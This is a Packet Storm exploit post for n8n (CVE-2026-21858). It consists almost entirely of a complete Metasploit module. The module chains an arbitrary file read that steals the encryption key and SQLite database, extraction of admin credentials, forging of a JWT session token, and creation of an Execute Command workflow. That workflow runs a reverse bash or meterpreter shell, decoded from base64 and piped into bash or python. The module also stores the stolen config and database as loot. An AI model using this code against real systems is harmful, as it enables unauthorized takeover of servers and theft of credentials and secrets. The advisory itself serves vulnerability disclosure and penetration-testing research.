📄 n8n Workflow Automation Remote Configuration / Admin Data Extraction

🗓️ 17 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm
🔗 packetstorm.news | 👁 257 Views

Proof of concept for exploiting n8n misconfigurations to read config files, extract admin credentials, and generate tokens.

=============================================================================================================================================
    | # Title     : n8n Workflow Automation - Remote Configuration & Admin Data Extraction                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://n8n.io/                                                                                                             |
    =============================================================================================================================================
    
    [+] Summary    : This Metasploit module is a proof of concept (PoC) for exploiting misconfigured n8n workflow automation instances. It shows how an attacker could:
    
    - Read configuration files containing sensitive data (e.g., encryption keys).
    - Extract administrator credentials from the SQLite database.
    - Generate authentication tokens for privileged access.
    - Optionally create and execute workflows to run commands (PoC only; not for real attacks).
    
    The module is intended for security research, penetration testing with explicit authorization, and vulnerability reporting. It includes error handling, request retries, and workflow cleanup to limit its impact on the target system.
    
    [+] POC : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'jwt'
    require 'sqlite3'
    require 'base64'
    require 'digest'
    require 'tempfile'
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ManualRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'n8n Unauthenticated Remote Code Execution',
            'Description' => %q{
              This module exploits multiple vulnerabilities in n8n workflow automation tool.
              It leverages a file read vulnerability to steal encryption keys and database,
              then uses stolen credentials to authenticate and execute arbitrary commands
              via the Execute Command node.
            },
            'Author' => [
              'indoushka'
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-21858'],
              ['URL', 'https://n8n.io']
            ],
            'Privileged' => false,
            'Platform' => ['linux', 'unix'],
            'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
            'Targets' => [
              [
                'Linux Command',
                {
                  'Arch' => ARCH_CMD,
                  'Platform' => 'unix',
                  'DefaultOptions' => {
                    'PAYLOAD' => 'cmd/unix/reverse_bash'
                  }
                }
              ],
              [
                'Linux Dropper',
                {
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'Platform' => 'linux',
                  'DefaultOptions' => {
                    'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
                  }
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DisclosureDate' => '2026-02-14',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options(
          [
            OptString.new('TARGETURI', [true, 'The base path to n8n', '/']),
            OptString.new('FORM_PATH', [true, 'Path to the vulnerable form endpoint', '/form/']),
            OptString.new('HOME_DIR', [true, 'n8n home directory', '/home/n8n']),
            OptString.new('BROWSER_ID', [false, 'Browser ID for session', 'msf_browser_' + Rex::Text.rand_text_alphanumeric(8)]),
            OptInt.new('WAIT_TIME', [true, 'Time to wait between requests', 5]),
            OptBool.new('FOLLOW_REDIRECT', [true, 'Follow HTTP redirects', true]),
            OptBool.new('CLEANUP', [true, 'Attempt to clean up created workflows', true]),
            OptInt.new('RETRY_COUNT', [true, 'Number of retries for failed requests', 3]),
            OptEnum.new('PAYLOAD_METHOD', [true, 'Method to execute payload', 'auto', ['auto', 'bash', 'sh', 'python3', 'python']])
          ]
        )
      end
    
      def ensure_payload_loaded
        unless payload
          print_error("No payload configured. Use 'set PAYLOAD <payload>'")
          return false
        end
        true
      end
    
      def parse_json_response(response, context = 'response')
        return [nil, "No response to parse"] unless response
        
        begin
          json_data = JSON.parse(response.body)
          return [json_data, nil]
        rescue JSON::ParserError => e
          error_msg = "Failed to parse JSON from #{context}: #{e.message}"
          if datastore['VERBOSE'] && response.body
            print_warning("Raw response (first 200 chars): #{response.body[0..200]}")
          end
          return [nil, error_msg]
        end
      end
    
      def send_request_with_retry(opts, expected_codes = [200])
        retries = 0
        expected_codes = [expected_codes] unless expected_codes.is_a?(Array)
        
        begin
          opts['follow_redirect'] = datastore['FOLLOW_REDIRECT'] unless opts.key?('follow_redirect')
          res = send_request_cgi(opts)
    
          unless res
            retries += 1
            if retries < datastore['RETRY_COUNT']
              vprint_warning("Request failed (no response), retrying (#{retries}/#{datastore['RETRY_COUNT']})...")
              sleep(1)
              retry
            else
              return [nil, "No response after #{retries} retries"]
            end
          end
    
          if expected_codes.include?(res.code)
            return [res, nil]
          else
            retries += 1
            if retries < datastore['RETRY_COUNT']
              vprint_warning("Request returned HTTP #{res.code} (expected #{expected_codes.join(', ')}), retrying...")
              sleep(1)
              retry
            else
              return [res, "Unexpected HTTP code: #{res.code} (expected #{expected_codes.join(', ')})"]
            end
          end
          
        rescue => e
          retries += 1
          if retries < datastore['RETRY_COUNT']
            vprint_warning("Request error: #{e.message}, retrying (#{retries}/#{datastore['RETRY_COUNT']})...")
            sleep(1)
            retry
          else
            return [nil, "Request failed after #{retries} retries: #{e.message}"]
          end
        end
      end
    
      def read_file_via_form(filepath)
        begin
          base_uri = datastore['TARGETURI']
          base_uri = '/' if base_uri.empty?
          
          form_uri = normalize_uri(base_uri, datastore['FORM_PATH'])
          
          payload = {
            'data' => {},
            'files' => {
              'file' => {
                'filepath' => filepath,
                'originalFilename' => 'pwn.txt'
              }
            }
          }.to_json
    
          vprint_status("Attempting to read: #{filepath}")
          
          res, error = send_request_with_retry({
            'method' => 'POST',
            'uri' => form_uri,
            'ctype' => 'application/json',
            'data' => payload
          }, 200)
    
          unless res
            print_error("Failed to read #{filepath}: #{error}")
            return nil
          end
    
          json_res, parse_error = parse_json_response(res, "file read POST response")
          
          if parse_error
            print_error("Failed to parse response for #{filepath}: #{parse_error}")
            return nil
          end
    
          waiting_url = json_res&.dig('formWaitingUrl')
          
          unless waiting_url
            print_error("No formWaitingUrl in response for #{filepath}")
            return nil
          end
    
          vprint_good("Successfully triggered file read for #{filepath}")
          sleep(datastore['WAIT_TIME'])
          
          parsed_uri = URI.parse(waiting_url)
          file_res, file_error = send_request_with_retry({
            'method' => 'GET',
            'uri' => parsed_uri.path,
            'query' => parsed_uri.query
          }, 200)
          
          if file_res
            vprint_good("Successfully retrieved #{filepath} (#{file_res.body.length} bytes)")
            return file_res.body
          else
            print_error("Failed to retrieve file content for #{filepath}: #{file_error}")
            return nil
          end
          
        rescue => e
          print_error("Unexpected error reading #{filepath}: #{e.message}")
          print_error("Backtrace: #{e.backtrace.join("\n")}") if datastore['VERBOSE']
          return nil
        end
      end
    
      def extract_encryption_key(config_data)
        begin
          if config_data =~ /"encryptionKey"\s*:\s*"([^"]+)"/
            enc_key = $1
            print_good("Found encryption key: #{enc_key}")
    
            every_other = (0...enc_key.length).step(2).map { |i| enc_key[i] }.join
            final_secret = Digest::SHA256.hexdigest(every_other)
            vprint_good("Generated final secret: #{final_secret}")
            
            return final_secret
          else
            print_error("Could not find encryptionKey in config file")
            return nil
          end
        rescue => e
          print_error("Error extracting encryption key: #{e.message}")
          return nil
        end
      end
    
      def extract_admin_data_sqlite(db_content)
        temp_file = nil
        db = nil
        
        begin
    
          temp_file = Tempfile.new(['n8n_db', '.sqlite'])
          temp_file.binmode
          temp_file.write(db_content)
          temp_file.close
          
          db = SQLite3::Database.new(temp_file.path)
          db.results_as_hash = true
    
          tables = db.execute("SELECT name FROM sqlite_master WHERE type='table'")
          table_names = tables.map { |t| t['name'] }
          
          unless table_names.include?('user')
            print_warning("No 'user' table found in database. Available tables: #{table_names.join(', ')}")
            return nil
          end
    
          columns = db.execute("PRAGMA table_info(user)")
          column_names = columns.map { |c| c['name'] }
          vprint_status("User table columns: #{column_names.join(', ')}")
    
          id_column = column_names.include?('id') ? 'id' : nil
          email_column = column_names.include?('email') ? 'email' : nil
          password_column = column_names.include?('password') ? 'password' : nil
          
          unless id_column && email_column && password_column
            print_error("Required columns not found in user table")
            return nil
          end
    
          role_columns = column_names.select { |c| c.include?('role') }
          
          admin_query = nil
          
          if role_columns.any?
            role_col = role_columns.first
            admin_query = "SELECT #{id_column}, #{email_column}, #{password_column} FROM user WHERE #{role_col} IN ('global:owner', 'global:admin', 'owner', 'admin') LIMIT 1"
          else
    
            admin_query = "SELECT #{id_column}, #{email_column}, #{password_column} FROM user ORDER BY createdAt ASC LIMIT 1"
          end
          
          users = db.execute(admin_query)
          
          if users.any?
            admin_id = users[0][id_column].to_s
            admin_email = users[0][email_column]
            admin_password = users[0][password_column]
            
            print_good("Found admin via SQLite: #{admin_email} (ID: #{admin_id})")
    
            combined = "#{admin_email}:#{admin_password}"
            sha256_digest = Digest::SHA256.digest(combined)
            admin_hash = Base64.strict_encode64(sha256_digest)[0..9]
            vprint_good("Generated admin hash: #{admin_hash}")
            
            return {
              'admin_id' => admin_id,
              'admin_email' => admin_email,
              'admin_password_hash' => admin_password,
              'admin_hash' => admin_hash
            }
          else
            print_warning("No admin users found in database")
            return nil
          end
          
        rescue SQLite3::Exception => e
          print_error("SQLite parsing failed: #{e.message}")
          return nil
        rescue => e
          print_error("Error parsing SQLite: #{e.message}")
          return nil
        ensure
          db&.close if db
          if temp_file
            temp_file.close
            temp_file.unlink
          end
        end
      end
    
      def create_session_token(secret, admin_id, admin_hash)
        begin
          browser_id = datastore['BROWSER_ID']
          hashed_browser = Base64.strict_encode64(Digest::SHA256.digest(browser_id))
          
          payload = {
            'id' => admin_id,
            'hash' => admin_hash,
            'browserId' => hashed_browser,
            'usedMfa' => false,
            'iat' => Time.now.to_i,
            'exp' => Time.now.to_i + 86400
          }
          
          token = JWT.encode(payload, secret, 'HS256')
          vprint_good("Created authentication token: #{token[0..30]}...")
          
          return token
        rescue => e
          print_error("Failed to create JWT token: #{e.message}")
          return nil
        end
      end
    
      def create_workflow(token, command)
        begin
          base_uri = datastore['TARGETURI']
          base_uri = '/' if base_uri.empty?
          
          workflow_name = "exploit_#{Rex::Text.rand_text_numeric(6)}"
          node_id = "node_#{Rex::Text.rand_text_alphanumeric(8)}"
          
          workflow_data = {
            'name' => workflow_name,
            'active' => false,
            'nodes' => [
              {
                'parameters' => {
                  'command' => command
                },
                'name' => 'Execute Command',
                'type' => 'n8n-nodes-base.executeCommand',
                'typeVersion' => 1,
                'position' => [250, 250],
                'id' => node_id
              }
            ],
            'connections' => {}
          }.to_json
          
          res, error = send_request_with_retry({
            'method' => 'POST',
            'uri' => normalize_uri(base_uri, 'rest', 'workflows'),
            'ctype' => 'application/json',
            'headers' => {
              'browser-id' => datastore['BROWSER_ID']
            },
            'cookie' => "n8n-auth=#{token}",
            'data' => workflow_data
          }, 200)
          
          unless res
            print_error("Failed to create workflow: #{error}")
            return nil
          end
          
          json_res, parse_error = parse_json_response(res, "workflow creation")
          
          if parse_error
            print_error("Failed to parse workflow creation response: #{parse_error}")
            return nil
          end
          
          workflow_id = json_res&.dig('data', 'id')
          
          unless workflow_id
            print_error("No workflow ID in response")
            return nil
          end
          
          print_good("Created workflow: #{workflow_id}")
          return json_res['data']
          
        rescue => e
          print_error("Error creating workflow: #{e.message}")
          return nil
        end
      end
    
      def execute_workflow(token, workflow_info)
        begin
          return [nil, "No workflow info"] unless workflow_info&.dig('id')
          
          base_uri = datastore['TARGETURI']
          base_uri = '/' if base_uri.empty?
          
          workflow_id = workflow_info['id']
          
          run_res, run_error = send_request_with_retry({
            'method' => 'POST',
            'uri' => normalize_uri(base_uri, 'rest', 'workflows', workflow_id, 'run'),
            'ctype' => 'application/json',
            'headers' => {
              'browser-id' => datastore['BROWSER_ID']
            },
            'cookie' => "n8n-auth=#{token}",
            'data' => { 'workflowData' => workflow_info }.to_json
          }, 200)
          
          unless run_res
            return [nil, "Failed to execute workflow: #{run_error}"]
          end
          
          json_res, parse_error = parse_json_response(run_res, "execution")
          
          if parse_error
            return [nil, "Failed to parse execution response: #{parse_error}"]
          end
          
          execution_id = json_res&.dig('data', 'executionId')
          
          unless execution_id
            return [nil, "No execution ID in response"]
          end
          
          vprint_good("Executed workflow, execution ID: #{execution_id}")
    
          sleep(2)
          
          result_res, result_error = send_request_with_retry({
            'method' => 'GET',
            'uri' => normalize_uri(base_uri, 'rest', 'executions', execution_id),
            'ctype' => 'application/json',
            'headers' => {
              'browser-id' => datastore['BROWSER_ID']
            },
            'cookie' => "n8n-auth=#{token}"
          }, 200)
          
          unless result_res
            return [nil, "Failed to get execution result: #{result_error}"]
          end
          
          json_res, parse_error = parse_json_response(result_res, "execution result")
          
          if parse_error
            return [nil, "Failed to parse execution result: #{parse_error}"]
          end
          
          raw_data = json_res&.dig('data', 'data')
          
          unless raw_data
            return [nil, "No data in execution result"]
          end
          
          begin
            exec_data = JSON.parse(raw_data)
            output = extract_command_output(exec_data)
            return [output, nil]
          rescue JSON::ParserError
            return [raw_data, nil]
          end
          
        rescue => e
          return [nil, "Error executing workflow: #{e.message}"]
        end
      end
    
      def extract_command_output(exec_data)
        if exec_data.is_a?(Array)
          exec_data.reverse.each do |item|
            if item.is_a?(String) && !item.empty? && item != 'Execute Command' && !item.start_with?('node-')
              return item.strip
            end
          end
        end
        "No output captured"
      end
    
      def cleanup_workflows(token, workflow_ids)
        return unless datastore['CLEANUP'] && workflow_ids&.any?
        
        print_status("Cleaning up #{workflow_ids.length} workflows...")
        
        base_uri = datastore['TARGETURI']
        base_uri = '/' if base_uri.empty?
        
        workflow_ids.each do |wf_id|
          begin
            res, error = send_request_with_retry({
              'method' => 'DELETE',
              'uri' => normalize_uri(base_uri, 'rest', 'workflows', wf_id),
              'headers' => {
                'browser-id' => datastore['BROWSER_ID']
              },
              'cookie' => "n8n-auth=#{token}"
            }, [200, 204, 404]) # 404 means the workflow was already deleted
            
            if res && (res.code == 200 || res.code == 204)
              print_status("Cleaned up workflow: #{wf_id}")
            elsif res && res.code == 404
              print_status("Workflow #{wf_id} already deleted")
            else
              print_warning("Failed to delete workflow #{wf_id}: #{error}")
            end
          rescue => e
            print_warning("Error during cleanup of workflow #{wf_id}: #{e.message}")
          end
        end
      end
    
      def check
        begin
    
          test_file = "#{datastore['HOME_DIR']}/.n8n/config"
          data = read_file_via_form(test_file)
          
          if data && data.include?('encryptionKey')
            print_good("Target appears vulnerable - found encryption key in config")
            return Exploit::CheckCode::Vulnerable
          end
          
          return Exploit::CheckCode::Safe
          
        rescue => e
          print_error("Error during check: #{e.message}")
          return Exploit::CheckCode::Unknown
        end
      end
    
      def select_payload_method
        method = datastore['PAYLOAD_METHOD']
        
        if method == 'auto'
    
          [
            ['bash', 'bash -c'],
            ['sh', 'sh -c'],
            ['python3', 'python3 -c'],
            ['python', 'python -c']
          ].each do |name, _|
            return name
          end
          return 'bash' 
        end
        
        method
      end
    
      def generate_compatible_payload
        unless ensure_payload_loaded
          return nil
        end
        
        case target['Arch']
        when ARCH_CMD
          command = payload.encoded
    
          if command.length > 1000
            print_warning("Command payload is very long (#{command.length} chars)")
          end
          vprint_status("Using command payload")
          return command
          
        else
    
          payload_b64 = Rex::Text.encode_base64(payload.encoded)
          method = select_payload_method
          
          commands = {
            'bash' => "echo #{payload_b64} | base64 -d | bash",
            'sh' => "echo #{payload_b64} | base64 -d | sh",
            'python3' => "echo #{payload_b64} | python3 -c 'import base64,sys; exec(base64.b64decode(sys.stdin.read()))'",
            'python' => "echo #{payload_b64} | python -c 'import base64,sys; exec(base64.b64decode(sys.stdin.read()))'"
          }
          
          selected_command = commands[method]
          
          if selected_command
            print_status("Using #{method} method for payload execution")
            return selected_command
          else
    
            print_warning("Unknown method #{method}, falling back to bash")
            return commands['bash']
          end
        end
      end
    
      def exploit
        print_status("Starting n8n exploitation...")
    
        unless ensure_payload_loaded
          return
        end
        
        created_workflows = []
        token = nil
        admin_data = nil
        secret = nil
        
        begin
    
          print_status("Step 1: Stealing configuration file...")
          config_path = "#{datastore['HOME_DIR']}/.n8n/config"
          config_data = read_file_via_form(config_path)
          
          unless config_data
            print_error("Failed to read config file. Target may not be vulnerable or path is incorrect.")
            return
          end
    
          print_status("Step 2: Extracting encryption key...")
          secret = extract_encryption_key(config_data)
          unless secret
            print_error("Failed to extract encryption key")
            return
          end
    
          print_status("Step 3: Stealing database file...")
          db_path = "#{datastore['HOME_DIR']}/.n8n/database.sqlite"
          db_data = read_file_via_form(db_path)
          
          unless db_data
            print_error("Failed to read database file")
            return
          end
    
          print_status("Step 4: Extracting admin credentials...")
          admin_data = extract_admin_data_sqlite(db_data)
          
          unless admin_data
            print_error("Failed to extract admin data using SQLite parser")
            print_error("Database may be corrupted or from different n8n version")
            return
          end
          
          print_good("Successfully extracted admin credentials for: #{admin_data['admin_email']}")
    
          print_status("Step 5: Creating authentication token...")
          token = create_session_token(secret, admin_data['admin_id'], admin_data['admin_hash'])
          
          unless token
            print_error("Failed to create authentication token")
            return
          end
    
          print_status("Step 6: Preparing payload...")
          command = generate_compatible_payload
          
          unless command
            print_error("Failed to generate payload")
            return
          end
    
          print_status("Step 7: Creating malicious workflow...")
          workflow_info = create_workflow(token, command)
          
          unless workflow_info
            print_error("Failed to create workflow")
            return
          end
          
          created_workflows << workflow_info['id']
    
          print_status("Step 8: Executing payload...")
          output, error = execute_workflow(token, workflow_info)
          
          if error
            print_warning("Execution completed with warning: #{error}")
          end
          
          if output && output != "No output captured"
            print_good("Command executed successfully!")
            print_line("\n#{output}\n")
          else
            print_warning("No output captured, but payload may have executed")
          end
    
          print_status("Step 9: Saving loot...")
          
          loot_path = store_loot(
            'n8n.config',
            'text/plain',
            rhost,
            config_data,
            'n8n_config.txt',
            'n8n Configuration File'
          )
          print_good("Saved config to: #{loot_path}")
          
          loot_path = store_loot(
            'n8n.database',
            'application/x-sqlite3',
            rhost,
            db_data,
            'n8n_database.sqlite',
            'n8n SQLite Database'
          )
          print_good("Saved database to: #{loot_path}")
          
          print_good("Exploitation completed!")
          
        rescue => e
          print_error("Unexpected error during exploitation: #{e.message}")
          if datastore['VERBOSE']
            print_error("Backtrace: #{e.backtrace.join("\n")}")
          end
        ensure
    
          if token && created_workflows.any?
            cleanup_workflows(token, created_workflows)
          elsif created_workflows.any?
            print_warning("Cannot clean up workflows without authentication token")
          end
        end
      end
    end
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================
